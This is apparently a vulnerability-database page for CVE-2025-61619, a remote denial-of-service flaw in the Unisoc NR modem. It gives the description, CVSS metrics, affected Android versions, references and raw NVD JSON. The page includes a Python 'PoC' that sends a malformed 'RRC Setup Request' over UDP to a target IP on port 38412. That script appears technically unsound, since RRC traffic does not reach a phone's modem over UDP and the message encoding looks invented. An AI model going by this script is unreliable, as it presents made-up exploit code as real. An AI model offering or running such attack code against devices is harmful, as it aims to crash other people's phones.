CVE-2025-61619

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE

Unisoc NR Modem固件（所有未修复版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61619 PoC - Unisoc NR Modem DoS
# This PoC demonstrates sending malformed NR RRC messages
# to trigger input validation vulnerability in Unisoc modem

import socket
import struct
import random

def create_malformed_rrc_setup_request():
    """
    Create a malformed RRC Setup Request with oversized fields
    to trigger input validation vulnerability
    """
    # NR RRC Setup Request message header
    rrc_message = bytearray()
    
    # Message type: RRC Setup Request (0x00)
    rrc_message.extend([0x00, 0x01])
    
    # Uplink frequency info with oversized value
    rrc_message.extend([0x40, 0x00, 0xFF, 0xFF, 0xFF, 0xFF])
    
    # Cause field with invalid large value
    rrc_message.extend([0x00, 0xFF, 0xFF, 0xFF])
    
    # Spare bits with padding to overflow buffer
    rrc_message.extend([0xFF] * 1024)
    
    return bytes(rrc_message)

def send_to_target(target_ip, target_port=38412):
    """
    Send malformed NR RRC message to target device
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    malformed_msg = create_malformed_rrc_setup_request()
    
    print(f"[*] Sending malformed RRC message to {target_ip}:{target_port}")
    print(f"[*] Message length: {len(malformed_msg)} bytes")
    
    sock.sendto(malformed_msg, (target_ip, target_port))
    sock.close()
    print("[+] Malformed message sent successfully")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_61619_poc.py <target_ip>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    send_to_target(target_ip)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61619
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61619
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61619/
[4] VulDB https://vuldb.com/cve/CVE-2025-61619
[5] https://www.unisoc.com/en/support/announcement/1995394837938163714

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61619", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:49.010", "lastModified": "2025-12-02T15:54:01.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, existe una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría conducir a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}